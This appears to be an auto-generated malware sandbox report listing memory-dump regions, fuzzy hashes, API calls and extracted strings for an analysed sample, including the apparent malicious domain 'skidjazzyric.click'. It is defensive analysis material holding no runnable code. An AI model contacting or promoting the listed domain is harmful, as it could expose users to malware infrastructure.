                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: :;$L|
                                                                            • API String ID: 0-1612347595
                                                                            • Opcode ID: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
                                                                            • Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
                                                                            • Opcode Fuzzy Hash: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
                                                                            • Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: :;$L|
                                                                            • API String ID: 0-1612347595
                                                                            • Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                            • Instruction ID: aaf2eb9b735531f5081d7b1a9c4d987a8c5cc2d7204349eddd25eac4a65503d0
                                                                            • Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                            • Instruction Fuzzy Hash: E8A10871A053109BDB109F24CC8276B73E1EF913A4F18C52CE9A997292E37EED46C752
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NP,?$L|
                                                                            • API String ID: 0-1510515982
                                                                            • Opcode ID: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
                                                                            • Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
                                                                            • Opcode Fuzzy Hash: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
                                                                            • Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NP,?$L|
                                                                            • API String ID: 0-1510515982
                                                                            • Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                            • Instruction ID: e6fba5b68051542320ea3a94c01d00c2ee44f5e259a69891bb4037a8102c4ef7
                                                                            • Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                            • Instruction Fuzzy Hash: 02A149716847209BD725EF28C8C2B3BB7A6EBC5724F18C62CE59457291D738AC0187A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: UXY^$skidjazzyric.click
                                                                            • API String ID: 0-1204630608
                                                                            • Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                            • Instruction ID: d4a14a9f2c2f0854964ffc34a88a484fd9aac6a31bc7c6ca58301aeff22ad83a
                                                                            • Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                            • Instruction Fuzzy Hash: B79135B5504B418FD315CF2AC990622FBA2FF96300B188AACC0D24FB56C738E816CF95
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: UXY^$skidjazzyric.click
                                                                            • API String ID: 0-1204630608
                                                                            • Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                            • Instruction ID: 340464c5a22a1255679fdebee32847d32716d30aa75c92a9c376342ada54ba18
                                                                            • Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                            • Instruction Fuzzy Hash: 189134B1204B818FD3198F29C990662FBA2FF96301B18869CD4D24FB16C778E806CF95
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: _\]R$L|
                                                                            • API String ID: 2994545307-4274716903
                                                                            • Opcode ID: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
                                                                            • Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
                                                                            • Opcode Fuzzy Hash: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
                                                                            • Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: _\]R$L|
                                                                            • API String ID: 0-4274716903
                                                                            • Opcode ID: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                            • Instruction ID: 3c556bea3d4a18c39b6285b9768e87008da24fd6fbedb0fdb994c5e63bf13f2b
                                                                            • Opcode Fuzzy Hash: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                            • Instruction Fuzzy Hash: 9F913931508351ABCB18EF28D850A6FB7E2EFD5324F19C52CE4C597292E735E806C786
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: o~$yr
                                                                            • API String ID: 0-1013308823
                                                                            • Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                            • Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
                                                                            • Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                            • Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: o~$yr
                                                                            • API String ID: 0-1013308823
                                                                            • Opcode ID: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                            • Instruction ID: b02d998f634e0095adc837606d969e78c070c32842d55766ebb54e6cd74b8e20
                                                                            • Opcode Fuzzy Hash: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                            • Instruction Fuzzy Hash: CA91267690C3508BD724DF18C845A6BBBE2EFD1364F09892CE9C95B391E7B88905C787
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: =^"\$L|
                                                                            • API String ID: 0-543163469
                                                                            • Opcode ID: 5d48baccbf68c9a420e3b87b0224fb92148870bc23ec7fb025ccf02abde862b7
                                                                            • Instruction ID: 31f6d952e69ddc92c57c3d15082e8394249c76af6de0d574896d183d93ceef01
                                                                            • Opcode Fuzzy Hash: 5d48baccbf68c9a420e3b87b0224fb92148870bc23ec7fb025ccf02abde862b7
                                                                            • Instruction Fuzzy Hash: 4281DE383052019BE724DF1CD990A2BB3E2EF89314F54866DF9858B3A0DB35EC51CB0A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: :7$%$:7$%
                                                                            • API String ID: 0-2391988857
                                                                            • Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                            • Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
                                                                            • Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                            • Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: :7$%$:7$%
                                                                            • API String ID: 0-2391988857
                                                                            • Opcode ID: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                            • Instruction ID: 29bb8eebe5f9f27dafba0e1e575fd554400a1d380d1d90d8e1897e5e5cb296bc
                                                                            • Opcode Fuzzy Hash: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                            • Instruction Fuzzy Hash: EE21D3701083808BD7089F79C965B6FFBE5BB82318F105A2CE1D287291DBB4C409CB82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: L|$
                                                                            • API String ID: 0-3454784920
                                                                            • Opcode ID: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
                                                                            • Instruction ID: e04283a27258271cf97ade9884920f19d27338acfadd33708b50a9c8a4193983
                                                                            • Opcode Fuzzy Hash: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
                                                                            • Instruction Fuzzy Hash: A0110475318240AFDB648F28CD8677B73E6ABD2324F28863CD595C72D1EB38E8408B05
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: MO$MO
                                                                            • API String ID: 0-3148518880
                                                                            • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                            • Instruction ID: ab99d9f3b5172ce4c1ed6f043cf8e1311ac869fd1d9ac72c0abfb6a32b33bd85
                                                                            • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                            • Instruction Fuzzy Hash: 7211AC741442819BEF148FA8DD916A7BFA0EF42321F249AE8DC855F38BC678C501CF65
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 7&'$$vA\
                                                                            • API String ID: 0-2621209329
                                                                            • Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                            • Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
                                                                            • Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                            • Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 7&'$$vA\
                                                                            • API String ID: 0-2621209329
                                                                            • Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                            • Instruction ID: 941661211c9497e4f597abab8f77c984ee161a5ba94a982957fb4b16f0bba9a9
                                                                            • Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                            • Instruction Fuzzy Hash: 7BF068345245944BDB918F3C9C996BE67F0E753214F202AB5C65AE32A2C635C8918F08
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 782d56cc06f3b6973921e2512ebb950397a26f9326316825ec2b076d036e3b03
                                                                            • Instruction ID: c31a76099084191e3034c22a37ea28885ef806c0d431935db3893f7feff996f6
                                                                            • Opcode Fuzzy Hash: 782d56cc06f3b6973921e2512ebb950397a26f9326316825ec2b076d036e3b03
                                                                            • Instruction Fuzzy Hash: 92F1DE356087418FC724CF29C88066BFBE6EFD9300F08882EE5D597791E679E845CB96
                                                                            APIs
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00767E61
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStrings
                                                                            • String ID:
                                                                            • API String ID: 237503144-0
                                                                            • Opcode ID: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                            • Instruction ID: 7b7519787402d08ecae0c14f4485fd39fc1761f801572b80d29bf481579b7e32
                                                                            • Opcode Fuzzy Hash: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                            • Instruction Fuzzy Hash: B2B11572A087118BC318CF28C4917AAB7F2FFD9358F19962CE8C95B254E7389D01C795
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: L|
                                                                            • API String ID: 0-3780028802
                                                                            • Opcode ID: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
                                                                            • Instruction ID: d2e23a67c1903cd1e9c185385271eb72bcb916f6a4fd91b19e1fe5de6aa7faac
                                                                            • Opcode Fuzzy Hash: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
                                                                            • Instruction Fuzzy Hash: 4B122775B00226CBDB14CF68D8917AFB7B2FF8A300F5980A9C441AB3A5D7399D42DB54
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ''
                                                                            • API String ID: 0-694448769
                                                                            • Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                            • Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
                                                                            • Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                            • Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ''
                                                                            • API String ID: 0-694448769
                                                                            • Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                            • Instruction ID: 6d7c1169837977f005f42a274d0dce95e6bb283f80b090ae6d2d6d9dd82262cc
                                                                            • Opcode Fuzzy Hash: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                            • Instruction Fuzzy Hash: 3E910FB16183108BC7148F28C89167BBBE2EFD1364F18D92CE8D68B791E778D905C792
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: *+
                                                                            • API String ID: 0-2181965719
                                                                            • Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                            • Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
                                                                            • Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                            • Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: L|
                                                                            • API String ID: 0-3780028802
                                                                            • Opcode ID: 5194799259fd5a137c82c89d43496dce8058f14fa6ca7be25fd15c1bfac91166
                                                                            • Instruction ID: 4e43b3032b5f77b82ebf5265758dd730748cf5b28328c74b298a748a547da810
                                                                            • Opcode Fuzzy Hash: 5194799259fd5a137c82c89d43496dce8058f14fa6ca7be25fd15c1bfac91166
                                                                            • Instruction Fuzzy Hash: A2915635E04225DFDB15CFA8D8907AEB7B2FF4A300F9980A9D502AB351D739AD42CB44
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: L|
                                                                            • API String ID: 0-3780028802
                                                                            • Opcode ID: 8ede958760def0fb47ef62c8d664d44c55fbe6b810f6c68a305d53f1873dda57
                                                                            • Instruction ID: 523adafa0b8bbe951b617112803890eae90d5543d2d7e1c15263035ec543c470
                                                                            • Opcode Fuzzy Hash: 8ede958760def0fb47ef62c8d664d44c55fbe6b810f6c68a305d53f1873dda57
                                                                            • Instruction Fuzzy Hash: 4C81D474605301ABCB24EF1CD880A2E73F2EF9A710F15856CE9858B3A1EB35EC52CB55
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "
                                                                            • API String ID: 0-123907689
                                                                            • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                            • Instruction ID: 6564e7b3ad14b453794cbf2f19722db2d5742acb1a2f8ce2a072c031a44184fe
                                                                            • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                            • Instruction Fuzzy Hash: 23710432F083254BD714CE28E88071FBBE2ABC5710FA9852EE4958B391D239DD45878A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "
                                                                            • API String ID: 0-123907689
                                                                            • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                            • Instruction ID: d14d959fd0fd571f653d0ce1846cc743ccfe5ba4270a249d5934267f1fd00d15
                                                                            • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                            • Instruction Fuzzy Hash: 3B71C332B083559BDB348E28C48031EB7F2AFC5794F2AC56EE49C9B391D2799D45C741
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: _;=8
                                                                            • API String ID: 0-3640539833
                                                                            • Opcode ID: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                            • Instruction ID: e58a9c241393c577c0dbf69e703309a02622358f74323d7420d86702d8d0d07f
                                                                            • Opcode Fuzzy Hash: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                            • Instruction Fuzzy Hash: 245112B0521B008BC7249F25C8616B3BBF1EF52345B084E5DC4C38BB45E739A948CBA5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: _;=8
                                                                            • API String ID: 0-3640539833
                                                                            • Opcode ID: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                            • Instruction ID: bc6f8fb2116de63f1966cf5e2c0149cd10bed77137a1bdb39914563f939bccd3
                                                                            • Opcode Fuzzy Hash: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                            • Instruction Fuzzy Hash: 6F51F1B0511B408BC7289F25C861AB7BBF1FF52345B044E5DC9C38BA45E739A909CB61
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: *+
                                                                            • API String ID: 0-2181965719
                                                                            • Opcode ID: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
                                                                            • Instruction ID: c2a177804ea7285742a0d9166829631e8e2bb93e624f19a763dba66b40a878c4
                                                                            • Opcode Fuzzy Hash: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
                                                                            • Instruction Fuzzy Hash: 0E6130B140A3C18BD374CF2588957DBBBE2AFD6318F18892CD5C99B244EB384546CB87
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: L|
                                                                            • API String ID: 2994545307-3780028802
                                                                            • Opcode ID: 6946c5d2f57fcbacdc517e199e457a610470862e953e395443f30e92702119ba
                                                                            • Instruction ID: a4b821128decaa172c514915c42a23315f051a59fcda10375df645c6c4b50b9f
                                                                            • Opcode Fuzzy Hash: 6946c5d2f57fcbacdc517e199e457a610470862e953e395443f30e92702119ba
                                                                            • Instruction Fuzzy Hash: DF417C759043146BE310EF24ECC1B6BB7A4EF89708F10942EF985A7251E735EC04879A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
